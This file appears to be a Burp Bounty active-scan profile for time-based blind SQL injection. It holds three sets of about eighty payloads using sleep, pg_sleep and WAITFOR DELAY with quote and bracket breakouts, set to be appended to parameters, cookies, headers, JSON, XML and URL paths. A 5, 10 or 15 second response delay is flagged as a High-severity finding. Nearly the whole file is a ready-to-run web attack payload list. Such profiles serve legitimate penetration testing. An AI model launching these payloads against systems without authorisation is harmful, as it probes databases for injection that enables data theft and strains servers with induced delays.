[
  {
    "profile_name": "SQLi_Timebased",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,(select*from(select(sleep(5)))a)",
          "true,(sleep+5)--",
          "true,(sleep+5)",
          "true,(sleep(5))--",
          "true,(sleep(5))",
          "true,(SELECT+SLEEP(5))",
          "true,(WAITFOR+DELAY+\u00270:0:5\u0027)--",
          "true,(WAITFOR+DELAY+\u00270:0:5\u0027)",
          "true,(SELECT+pg_sleep(5))",
          "true,sleep(5)#",
          "true,1 or sleep(5)#",
          "true,\" or sleep(5)#",
          "true,\u0027 or sleep(5)#",
          "true,\" or sleep(5)\u003d\"",
          "true,\u0027 or sleep(5)\u003d\u0027",
          "true,1) or sleep(5)#",
          "true,\") or sleep(5)\u003d\"",
          "true,\u0027) or sleep(5)\u003d\u0027",
          "true,1)) or sleep(5)#",
          "true,\")) or sleep(5)\u003d\"",
          "true,\u0027)) or sleep(5)\u003d\u0027",
          "true,;waitfor delay \u00270:0:5\u0027--",
          "true,);waitfor delay \u00270:0:5\u0027--",
          "true,\u0027;waitfor delay \u00270:0:5\u0027--",
          "true,\";waitfor delay \u00270:0:5\u0027--",
          "true,\u0027);waitfor delay \u00270:0:5\u0027--",
          "true,\");waitfor delay \u00270:0:5\u0027--",
          "true,));waitfor delay \u00270:0:5\u0027--",
          "true,\u0027));waitfor delay \u00270:0:5\u0027--",
          "true,\"));waitfor delay \u00270:0:5\u0027--",
          "true,pg_sleep(5)--",
          "true,1 or pg_sleep(5)--",
          "true,\" or pg_sleep(5)--",
          "true,\u0027 or pg_sleep(5)--",
          "true,1) or pg_sleep(5)--",
          "true,\") or pg_sleep(5)--",
          "true,\u0027) or pg_sleep(5)--",
          "true,1)) or pg_sleep(5)--",
          "true,\")) or pg_sleep(5)--",
          "true,\u0027)) or pg_sleep(5)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(5)))eee) AND \u0027eee\u0027\u003d\u0027eee",
          "true, AND (SELECT * FROM (SELECT(SLEEP(5)))eee) AND \u0027%\u0027\u003d\u0027",
          "true, AND (SELECT * FROM (SELECT(SLEEP(5)))eee)",
          "true, AND (SELECT * FROM (SELECT(SLEEP(5)))eee)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(5)))eee)#",
          "true, SLEEP(5)#",
          "true, SLEEP(5)--",
          "true, SLEEP(5)\u003d\"",
          "true, SLEEP(5)\u003d\u0027",
          "true, or SLEEP(5)",
          "true, or SLEEP(5)#",
          "true, or SLEEP(5)--",
          "true, or SLEEP(5)\u003d\"",
          "true, or SLEEP(5)\u003d\u0027",
          "true, waitfor delay \u002700:00:05\u0027",
          "true, waitfor delay \u002700:00:05\u0027--",
          "true, waitfor delay \u002700:00:05\u0027#",
          "true, pg_SLEEP(5)",
          "true, pg_SLEEP(5)--",
          "true, pg_SLEEP(5)#",
          "true, or pg_SLEEP(5)",
          "true, or pg_SLEEP(5)--",
          "true, or pg_SLEEP(5)#",
          "true, AnD SLEEP(5)",
          "true, AnD SLEEP(5)--",
          "true, AnD SLEEP(5)#",
          "true, \u0026\u0026SLEEP(5)",
          "true, \u0026\u0026SLEEP(5)--",
          "true, \u0026\u0026SLEEP(5)#",
          "true,\u0027 AnD SLEEP(5) ANd \u00271",
          "true,\u0027\u0026\u0026SLEEP(5)\u0026\u0026\u00271",
          "true, ORDER BY SLEEP(5)",
          "true, ORDER BY SLEEP(5)--",
          "true, ORDER BY SLEEP(5)#",
          "true, (SELECT * FROM (SELECT(SLEEP(5)))a)",
          "true, (SELECT * FROM (SELECT(SLEEP(5)))a)#",
          "true, (SELECT * FROM (SELECT(SLEEP(5)))a)--",
          "true,+ SLEEP(5) + \u0027",
          "true,\u0027 + SLEEP(5) + "
        ],
        "payloads_file": "",
        "payload_position": "append",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Time Delay,,5"
        ],
        "redir_type": "never",
        "max_redir": 0,
        "show_alert": "none",
        "issue_name": "",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      },
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,(select*from(select(sleep(10)))a)",
          "true,(sleep+10)--",
          "true,(sleep+10)",
          "true,(sleep(10))--",
          "true,(sleep(10))",
          "true,(SELECT+SLEEP(10))",
          "true,(WAITFOR+DELAY+\u00270:0:10\u0027)--",
          "true,(WAITFOR+DELAY+\u00270:0:10\u0027)",
          "true,(SELECT+pg_sleep(10))",
          "true,sleep(10)#",
          "true,1 or sleep(10)#",
          "true,\" or sleep(10)#",
          "true,\u0027 or sleep(10)#",
          "true,\" or sleep(10)\u003d\"",
          "true,\u0027 or sleep(10)\u003d\u0027",
          "true,1) or sleep(10)#",
          "true,\") or sleep(10)\u003d\"",
          "true,\u0027) or sleep(10)\u003d\u0027",
          "true,1)) or sleep(10)#",
          "true,\")) or sleep(10)\u003d\"",
          "true,\u0027)) or sleep(10)\u003d\u0027",
          "true,;waitfor delay \u00270:0:10\u0027--",
          "true,);waitfor delay \u00270:0:10\u0027--",
          "true,\u0027;waitfor delay \u00270:0:10\u0027--",
          "true,\";waitfor delay \u00270:0:10\u0027--",
          "true,\u0027);waitfor delay \u00270:0:10\u0027--",
          "true,\");waitfor delay \u00270:0:10\u0027--",
          "true,));waitfor delay \u00270:0:10\u0027--",
          "true,\u0027));waitfor delay \u00270:0:10\u0027--",
          "true,\"));waitfor delay \u00270:0:10\u0027--",
          "true,pg_sleep(10)--",
          "true,1 or pg_sleep(10)--",
          "true,\" or pg_sleep(10)--",
          "true,\u0027 or pg_sleep(10)--",
          "true,1) or pg_sleep(10)--",
          "true,\") or pg_sleep(10)--",
          "true,\u0027) or pg_sleep(10)--",
          "true,1)) or pg_sleep(10)--",
          "true,\")) or pg_sleep(10)--",
          "true,\u0027)) or pg_sleep(10)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(10)))eee) AND \u0027eee\u0027\u003d\u0027eee",
          "true, AND (SELECT * FROM (SELECT(SLEEP(10)))eee) AND \u0027%\u0027\u003d\u0027",
          "true, AND (SELECT * FROM (SELECT(SLEEP(10)))eee)",
          "true, AND (SELECT * FROM (SELECT(SLEEP(10)))eee)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(10)))eee)#",
          "true, SLEEP(10)#",
          "true, SLEEP(10)--",
          "true, SLEEP(10)\u003d\"",
          "true, SLEEP(10)\u003d\u0027",
          "true, or SLEEP(10)",
          "true, or SLEEP(10)#",
          "true, or SLEEP(10)--",
          "true, or SLEEP(10)\u003d\"",
          "true, or SLEEP(10)\u003d\u0027",
          "true, waitfor delay \u002700:00:010\u0027",
          "true, waitfor delay \u002700:00:010\u0027--",
          "true, waitfor delay \u002700:00:010\u0027#",
          "true, pg_SLEEP(10)",
          "true, pg_SLEEP(10)--",
          "true, pg_SLEEP(10)#",
          "true, or pg_SLEEP(10)",
          "true, or pg_SLEEP(10)--",
          "true, or pg_SLEEP(10)#",
          "true, AnD SLEEP(10)",
          "true, AnD SLEEP(10)--",
          "true, AnD SLEEP(10)#",
          "true, \u0026\u0026SLEEP(10)",
          "true, \u0026\u0026SLEEP(10)--",
          "true, \u0026\u0026SLEEP(10)#",
          "true,\u0027 AnD SLEEP(10) ANd \u00271",
          "true,\u0027\u0026\u0026SLEEP(10)\u0026\u0026\u00271",
          "true, ORDER BY SLEEP(10)",
          "true, ORDER BY SLEEP(10)--",
          "true, ORDER BY SLEEP(10)#",
          "true, (SELECT * FROM (SELECT(SLEEP(10)))a)",
          "true, (SELECT * FROM (SELECT(SLEEP(10)))a)#",
          "true, (SELECT * FROM (SELECT(SLEEP(10)))a)--",
          "true,+ SLEEP(10) + \u0027",
          "true,\u0027 + SLEEP(10) + \u0027"
        ],
        "payloads_file": "",
        "payload_position": "append",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Time Delay,,10"
        ],
        "redir_type": "never",
        "max_redir": 0,
        "show_alert": "none",
        "issue_name": "",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      },
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,(select*from(select(sleep(15)))a)",
          "true,(sleep+15)--",
          "true,(sleep+15)",
          "true,(sleep(15))--",
          "true,(sleep(15))",
          "true,(SELECT+SLEEP(15))",
          "true,(WAITFOR+DELAY+\u00270:0:15\u0027)--",
          "true,(WAITFOR+DELAY+\u00270:0:15\u0027)",
          "true,(SELECT+pg_sleep(15))",
          "true,sleep(15)#",
          "true,1 or sleep(15)#",
          "true,\" or sleep(15)#",
          "true,\u0027 or sleep(15)#",
          "true,\" or sleep(15)\u003d\"",
          "true,\u0027 or sleep(15)\u003d\u0027",
          "true,1) or sleep(15)#",
          "true,\") or sleep(15)\u003d\"",
          "true,\u0027) or sleep(15)\u003d\u0027",
          "true,1)) or sleep(15)#",
          "true,\")) or sleep(15)\u003d\"",
          "true,\u0027)) or sleep(15)\u003d\u0027",
          "true,;waitfor delay \u00270:0:15\u0027--",
          "true,);waitfor delay \u00270:0:15\u0027--",
          "true,\u0027;waitfor delay \u00270:0:15\u0027--",
          "true,\";waitfor delay \u00270:0:15\u0027--",
          "true,\u0027);waitfor delay \u00270:0:15\u0027--",
          "true,\");waitfor delay \u00270:0:15\u0027--",
          "true,));waitfor delay \u00270:0:15\u0027--",
          "true,\u0027));waitfor delay \u00270:0:15\u0027--",
          "true,\"));waitfor delay \u00270:0:15\u0027--",
          "true,pg_sleep(15)--",
          "true,1 or pg_sleep(15)--",
          "true,\" or pg_sleep(15)--",
          "true,\u0027 or pg_sleep(15)--",
          "true,1) or pg_sleep(15)--",
          "true,\") or pg_sleep(15)--",
          "true,\u0027) or pg_sleep(15)--",
          "true,1)) or pg_sleep(15)--",
          "true,\")) or pg_sleep(15)--",
          "true,\u0027)) or pg_sleep(15)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(15)))eee) AND \u0027eee\u0027\u003d\u0027eee",
          "true, AND (SELECT * FROM (SELECT(SLEEP(15)))eee) AND \u0027%\u0027\u003d\u0027",
          "true, AND (SELECT * FROM (SELECT(SLEEP(15)))eee)",
          "true, AND (SELECT * FROM (SELECT(SLEEP(15)))eee)--",
          "true, AND (SELECT * FROM (SELECT(SLEEP(15)))eee)#",
          "true, SLEEP(15)#",
          "true, SLEEP(15)--",
          "true, SLEEP(15)\u003d\"",
          "true, SLEEP(15)\u003d\u0027",
          "true, or SLEEP(15)",
          "true, or SLEEP(15)#",
          "true, or SLEEP(15)--",
          "true, or SLEEP(15)\u003d\"",
          "true, or SLEEP(15)\u003d\u0027",
          "true, waitfor delay \u002700:00:015\u0027",
          "true, waitfor delay \u002700:00:015\u0027--",
          "true, waitfor delay \u002700:00:015\u0027#",
          "true, pg_SLEEP(15)",
          "true, pg_SLEEP(15)--",
          "true, pg_SLEEP(15)#",
          "true, or pg_SLEEP(15)",
          "true, or pg_SLEEP(15)--",
          "true, or pg_SLEEP(15)#",
          "true, AnD SLEEP(15)",
          "true, AnD SLEEP(15)--",
          "true, AnD SLEEP(15)#",
          "true, \u0026\u0026SLEEP(15)",
          "true, \u0026\u0026SLEEP(15)--",
          "true, \u0026\u0026SLEEP(15)#",
          "true,\u0027 AnD SLEEP(15) ANd \u00271",
          "true,\u0027\u0026\u0026SLEEP(15)\u0026\u0026\u00271",
          "true, ORDER BY SLEEP(15)",
          "true, ORDER BY SLEEP(15)--",
          "true, ORDER BY SLEEP(15)#",
          "true, (SELECT * FROM (SELECT(SLEEP(15)))a)",
          "true, (SELECT * FROM (SELECT(SLEEP(15)))a)#",
          "true, (SELECT * FROM (SELECT(SLEEP(15)))a)--",
          "true,+ SLEEP(15) + \u0027",
          "true,\u0027 + SLEEP(15) + \u0027"
        ],
        "payloads_file": "",
        "payload_position": "append",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Time Delay,,15"
        ],
        "redir_type": "never",
        "max_redir": 0,
        "show_alert": "always",
        "issue_name": "SQLi_Timebased",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "All",
      "SQLi_TimeBased",
      "SQLi"
    ]
  }
]